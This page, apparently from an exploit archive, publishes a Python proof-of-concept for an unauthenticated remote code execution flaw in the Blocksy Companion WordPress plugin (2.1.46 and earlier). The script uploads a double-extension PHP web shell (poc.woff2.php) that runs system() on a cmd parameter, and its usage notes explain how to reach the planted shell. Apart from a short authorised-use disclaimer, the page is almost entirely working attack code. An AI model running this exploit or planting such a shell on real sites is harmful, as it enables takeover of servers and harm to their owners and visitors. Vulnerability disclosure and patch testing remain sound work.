Skip to main content

Blocksy Companion 2.1.46 – RCE

Categories: WebApps

Blocksy Companion 2.1.46 – RCE

Proof of Concept (PoC)

poc.py
#!/usr/bin/env python3
# Exploit Title:        Blocksy Companion 2.1.46 - RCE
# CVE:                  CVE-2026-58480
# Date:                 2026-07-13
# Exploit Author:       Mohammed Idrees Banyamer
# Author Country:       Jordan
# Instagram:            @banyamer_security
# Author GitHub:        https://github.com/mbanyamer
# Author Blog  :        https://banyamersecurity.com/blog/
# Vendor Homepage:      https://creativethemes.com
# Software Link:        https://wordpress.org/plugins/blocksy-companion/
# Affected:             Blocksy Companion <= 2.1.46 (Pro with Advanced Reviews + Custom Fonts)
# Tested on:            WordPress + Blocksy Companion 2.1.46
# Category:             WebApps
# Platform:             PHP
# Exploit Type:         Remote Code Execution (Unauthenticated)
# CVSS:                 9.8 (Critical)
# Description:          Unauthenticated arbitrary file upload via blc-review-images[] parameter in save_attachments.
#                       Double-extension bypass (.woff2.php) due to strpos() check in Custom Fonts extension.
# Fixed in:             2.1.47
# Usage:
#   python3 exploit.py <target_url>
#
# Examples:
#   python3 exploit.py http://target.com
#
# Notes:
#   • Requires Advanced Reviews and Custom Fonts extensions enabled.
#   • Uploaded shell lands in wp-content/uploads/ (check response for exact path).
#
# How to Use
#
# Step 1:
#   Run the script with target URL.
#
# Step 2:
#   Use the generated shell URL with ?cmd=command (e.g. ?cmd=id)

import requests
import sys

def banner():
    print(r"""
╔██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗
║██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║
╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
        ╔═╗ Banyamer Security ╔═╗
""")

if len(sys.argv) < 2:
    banner()
    print("Usage: python3 exploit.py <http://target.com>")
    sys.exit(1)

banner()

target = sys.argv[1].rstrip('/')
shell_name = "poc.woff2.php"
payload = """<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
    exit;
}
echo 'Blocksy RCE PoC - CVE-2026-58480 | @banyamer_security';
?>
"""

files = {
    'blc-review-images[]': (shell_name, payload, 'application/octet-stream')
}

data = {
    'action': 'blc_save_review_attachments'
}

print("[+] Sending unauthenticated file upload...")
try:
    r = requests.post(f"{target}/wp-admin/admin-ajax.php", files=files, data=data, timeout=15)
    print(f"Status: {r.status_code}")
    print(r.text[:600])
    print("n[+] If successful, check wp-content/uploads/ for the shell.")
    print(f"[+] Example: {target}/wp-content/uploads/YEAR/MONTH/{shell_name}?cmd=id")
except Exception as e:
    print(f"[-] Error: {e}")

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...